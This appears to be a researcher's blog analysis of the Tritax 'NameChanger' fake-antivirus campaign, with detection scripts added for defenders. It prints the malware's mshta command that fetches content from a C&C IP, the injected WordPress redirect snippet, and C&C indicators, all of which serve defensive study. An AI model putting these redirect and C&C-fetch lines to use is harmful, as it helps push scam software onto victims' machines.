This time I’m diving into an active FakeAV campaign that I’ve named the NameChanger FakeAV; it falls under the Tritax family. Why did I name it the NameChanger? Just take a look at the following image, composed of screenshots of all the different samples:

Update (27-2-2014): Updated the end of the article with a list of domains and IPs seen in the past 2 months. Tritax is still active and distributing.

Update (20-3-2014): After sinkholing and actively taking down the domains with the help of some friends, it seems the Tritax actors gave up. The TDSs stopped redirecting and no new domains are being registered; taking action against this campaign was successful!

Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695

Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by Invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/

Skype advertisements have also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251

More recently the same campaign was seen by @Malekal redirecting via PopAds delivered advertisement: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736



David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code

The Tritax family has been around for a long time; the first sample of it was seen around May 2009. The current campaign drops a sample I have named NameChanger.C, as it’s the third FakeAV type from this family that is constantly being repackaged with new names.

I’ll start off with an analysis of the current version of the FakeAV. After this I’ll go into the family, and third will be the new FakeAV social engineering kit this group is using with their current campaign. I’ll end with a section which is a hash dump of all the samples I’ve been scraping from their backend.

Analysis

This sample drops from a specialized social engineering kit for FakeAVs; I’ll get into details about this later. The name for this version is “Windows Accelerator Pro”, MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).

It initially installs itself in the usual startup location; the key name for these samples is “GuardSoftware”:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GuardSoftware"="C:\Documents and Settings\admin\Application Data\guard-hqxl.exe"

The filename is formatted as “guard-%s.exe”, as can be seen when running the sample through OllyDBG in the image below. Since the 1st or 2nd of February, samples are formatted as “svc-%s.exe” instead.





After the sample has installed itself it will force a reboot in order to make sure no other analysis tools are started. When it is first run (before the reboot) it will show a splash screen:





Once the machine has rebooted it will show the usual fake scanning with detection of infected items:





Once completed the user gets a listing of all the affected files:





When you attempt to clear up the infections by hitting “Remove All” we get a message regarding activation. You cannot clean up until you activate the product:

Before we activate the ‘product’, let’s have a look around at what it ‘can’ do for us:

All of course are unavailable to us unless we activate. When enabling one of the options we get the same “Activate” popup.

There’s also an about section in the ‘product’:

Besides the fake scanning and available options it will also show a variety of fake warning messages:





Some more aggressive warnings appear from time to time as well:





We are also, as usual with FakeAVs, not allowed to start any applications because they are ‘infected’:



It also warns us that we are torrenting and that downloading pirated material is a felony:







When we click the “Get anonymous connection” button we go back to the activation form again. When we hit the “Activate” button we are greeted by a payment form:





The form is retrieved by starting the Microsoft HTA client:

mshta.exe "http://93.115.82.249/?0=16&1=0&2=9&3=p&4=2600&5=1&6=1111&7=byuqshgtbm"

This is the C&C for this FakeAV; all subsequent traffic from this sample will go towards this IP.
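The command line above has a shape that is easy to hunt for in process-creation logs: mshta loading a remote URL whose host is a bare IP address and whose query keys are all numeric. The following is an added example, not part of the original analysis; the function names, the scoring and the sample command lines are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# mshta as the launched program, optionally quoted and with a directory prefix.
MSHTA = re.compile(r'^\s*"?(?:[^"]*\\)?mshta(?:\.exe)?"?\s', re.IGNORECASE)
URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)

def classify_mshta(cmdline):
    """Describe the remote URL an mshta command line loads, or return None."""
    if not MSHTA.match(cmdline):
        return None
    found = URL.search(cmdline)
    if not found:
        return None                      # local .hta file: out of scope here
    parts = urlsplit(found.group(0))
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        ip_literal = True                # no DNS name involved
    except ValueError:
        ip_literal = False
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return {
        "host": host,
        "ip_literal": ip_literal,
        "numeric_keys": bool(keys) and all(k.isdigit() for k in keys),
    }

def score(cmdline):
    """0 = no remote mshta fetch, 1 = remote fetch, +1 IP host, +1 numeric keys."""
    info = classify_mshta(cmdline)
    if info is None:
        return 0
    return 1 + info["ip_literal"] + info["numeric_keys"]

# Constructed command lines (192.0.2.0/24 is a documentation range).
EVENTS = [
    'mshta.exe "http://192.0.2.10/?0=16&1=0&2=9&3=p"',
    '"C:\\Windows\\System32\\mshta.exe" "C:\\Tools\\inventory.hta"',
    'notepad.exe C:\\notes\\mshta.txt',
    'mshta.exe https://intranet.example.test/app.hta?user=alice',
]

if __name__ == "__main__":
    for event in EVENTS:
        print(score(event), event)
```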



Now if we go to the “Register” section we can ‘activate’ the product:



We do need a valid key for this one. The key for this sample is:

1W111-111B1-11T11-E1121



Note: If you have any old infections from before July 2012 the key is “0W000-000B0-00T00-E0020”

When we enter the correct key we are allowed to activate:



As soon as we hit the “Register” button we are taken back to the scan results page and it will start ‘cleaning’ up the infections:





Now if we look at the application it has all turned green and all ‘functionality’ is available to us:



The about form is also updated with the activation date and serial:





The application stores the activation data in the registry like this:







[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings]
"UID"="lthsidoaat"
"net"="2014-1-9_3"
"Config"=hex:de,07,01,00,<truncated>
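Both registry artefacts described so far (the “GuardSoftware” Run entry with its guard-/svc- filename and the UID/net/Config activation values) can be checked in one pass over a regedit export. The following is an added example, not code from the original analysis; `parse_reg`, `triage` and the sample export are constructed for illustration, and a bare “svc-” filename match should be treated as a lead since legitimate software can use similar names.

```python
import re

# Indicators from the analysis above; matches are leads, not verdicts.
HKCU_CV = r"hkey_current_user\software\microsoft\windows\currentversion"
RUN_KEY = HKCU_CV + r"\run"
SETTINGS_KEY = HKCU_CV + r"\settings"
RUN_VALUE_NAME = "guardsoftware"
DROP_NAME = re.compile(r"\\(?:guard|svc)-[^\\]+\.exe$", re.IGNORECASE)
ACTIVATION_VALUES = {"uid", "net", "config"}

def parse_reg(text):
    """Parse regedit-export text into {key: {value_name: raw_data}}, lower-cased."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None:
            m = re.match(r'"([^"]+)"=(.*)$', line)
            if m:
                current[m.group(1).lower()] = m.group(2)
    return keys

def triage(text):
    """Return findings for the Run-key persistence and the activation values."""
    keys, findings = parse_reg(text), []
    for name, data in keys.get(RUN_KEY, {}).items():
        path = data.strip('"').replace("\\\\", "\\")  # undo .reg escaping
        if name == RUN_VALUE_NAME or DROP_NAME.search(path):
            findings.append(("persistence", name, path))
    if ACTIVATION_VALUES <= set(keys.get(SETTINGS_KEY, {})):
        findings.append(("activation-data", SETTINGS_KEY, sorted(ACTIVATION_VALUES)))
    return findings

# Constructed sample export; the Config bytes and the svc- entry are placeholders.
SAMPLE = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GuardSoftware"="C:\\Documents and Settings\\admin\\Application Data\\guard-hqxl.exe"
"Updater"="C:\\Documents and Settings\\admin\\Application Data\\svc-abcd.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings]
"UID"="lthsidoaat"
"net"="2014-1-9_3"
"Config"=hex:00,00,00,00
'''
if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```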

The “Config” key holds the activation key as well:





This FakeAV has inbuilt translations for German, French and Spanish:



I’ve seen the following IPs for the C&Cs in samples dating from November 2013 until February 2013:

93.115.82.249

93.115.82.248

93.115.86.197

Interesting fact: these guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.

The Family

The FakeAV family that was spreading here is called ‘Tritax’. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/



The first sample appeared around May 2009; it was called “Crusader Antivirus”:



This one displayed the usual fake warnings and fake scanning like we see now:

This FakeAV was meant to look like the AGAVA Antispy application, which was a legit application. Crusader mimicked most of the GUI of Antispy:

This first sample is in fact where the “Tritax” name comes from; on the about dialog a company was described as “TRITAX Limited”:

The sample for this one, MD5: 301b4ca82a0dc6931562e9b322ceb7c1

The 2nd installment of the family was called “SecretService”; this one has had 2 versions:



After the SecretService version, “Privacy Center” and “Safety Center” popped up:

After those we were greeted by “Privacy Center” and “Control Center”:

Now we are greeted with the first NameChanger variant; I’ve named it NameChanger.A. It first appeared in December 2010. It has been seen with the following names:

The GUI has had a few changes but the general look stayed the same. A few samples:

After variant A came the B variant: NameChanger.B appeared in May 2011. It has had the following names:

It looked the same in every sample; only the name constantly changed:



And in February 2012 the first version of our NameChanger.C appeared; it was named ‘Windows Protection Manager’.



This shows how long this group has been active: from 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they now have a good setup going with the special FakeAV kit.



The full list of used names so far for NameChanger.C:







The Social Engineering Kit

I encountered the first sample when being redirected from the Businessinsider website. While initially it seemed like a one-off I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.



When landing on this kit a user is greeted with a JavaScript alert message:

Then a page is shown with a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:

When clicking the “Clean computer” message the user is prompted with a download with names like “Setup.exe” or “Install.exe”. This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an antivirus suddenly comes up talking about infections on your computer.

I have found different FakeAV family campaigns using this kit; the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:

Around the 10th of January it suddenly changed the JavaScript on the landing page to a crypted version.

A week later, on the 17th of January, the landing page changed again, only this time the crypted JavaScript snippets were put in external files called “scr1.js” and “scr2.js”. Landing page code:

During this time the DNS for the landing page of the Tritax group is always on a subdomain; this is either ‘b2811a66’, ‘c3913c6c’, ‘e324rfds’, ‘wed322d2’, ‘5c4e4143’ or ‘90d6bc5a’. Of course this will change from time to time; it just means the main domain never points to the landing server, it’s always a subdomain. Additionally, the domains used by this group are registered at registrars allowing for domain tasting (5-day testing period, free!). The domains rotate every few days. The first registrar I saw them appear at was Domeny.pl; they are currently being tasted at Key-Systems GmbH. These are the stats in terms of TLDs I have seen:

106 pw
76 nl
30 pl
15 com



Here is a full list of all the domains used in the period of 1st of January 2014 until the 25th of January 2014.







These domains used custom nameservers; @vriesHD has done his best taking these down for the past months. The IPs I’ve seen used in this campaign’s landing pages are:


The following domains have been seen for the custom nameservers:


In addition to spreading via advertisements and spam mail, these guys have also compromised a large number of websites. All websites compromised are WordPress websites. A malicious PHP file was uploaded after exploitation. This file redirects to the domains listed above (and the new ones still being generated). These pages respond with:

window.top.location.replace("***tritax campaign landing page***");

They can usually be spotted when websites load JavaScript snippets like:

<script src="/wp-includes/js/jquery/jquery.php"></script>
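A site owner can check rendered pages for this pattern: a script tag that loads a .php file from the wp-includes/js tree, and a script response that consists only of a top-frame redirect to another host. The following is an added example, not code from the original post; the function names, the allowlist and the sample page are assumptions, with wp-tinymce.php allowlisted because it ships with WordPress core.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: allowlist of PHP script endpoints known to be legitimate on the site.
ALLOWED_SUFFIXES = ("/wp-includes/js/tinymce/wp-tinymce.php",)
REDIRECT = re.compile(
    r"""^\s*window\.top\.location\.replace\(\s*["']([^"']+)["']\s*\)\s*;?\s*$""")

class ScriptSources(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def suspicious_script_sources(html):
    """Return script src values that load a .php file from wp-includes/js."""
    collector = ScriptSources()
    collector.feed(html)
    hits = []
    for src in collector.sources:
        path = urlsplit(src).path.lower()
        if ("/wp-includes/js/" in path and path.endswith(".php")
                and not path.endswith(ALLOWED_SUFFIXES)):
            hits.append(src)
    return hits

def offsite_redirect_host(script_body, site_host):
    """Return the target host if the body is only a top-frame redirect off-site."""
    m = REDIRECT.match(script_body)
    host = urlsplit(m.group(1)).hostname if m else None
    return host if host and host.lower() != site_host.lower() else None

# Constructed page and script response; hosts are placeholders.
PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js?ver=1.10.2"></script>
<script src="/wp-includes/js/jquery/jquery.php"></script>
<script src="/blog/wp-includes/js/tinymce/wp-tinymce.php?c=1"></script>
</head><body></body></html>"""
BODY = 'window.top.location.replace("http://landing.example.test/");'

if __name__ == "__main__":
    print(suspicious_script_sources(PAGE))
    print(offsite_redirect_host(BODY, "blog.example.test"))
```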



The full list of websites affected (some of them have already cleaned up or have gone offline):





Collected DNS information from January -> February 2014

Collected Samples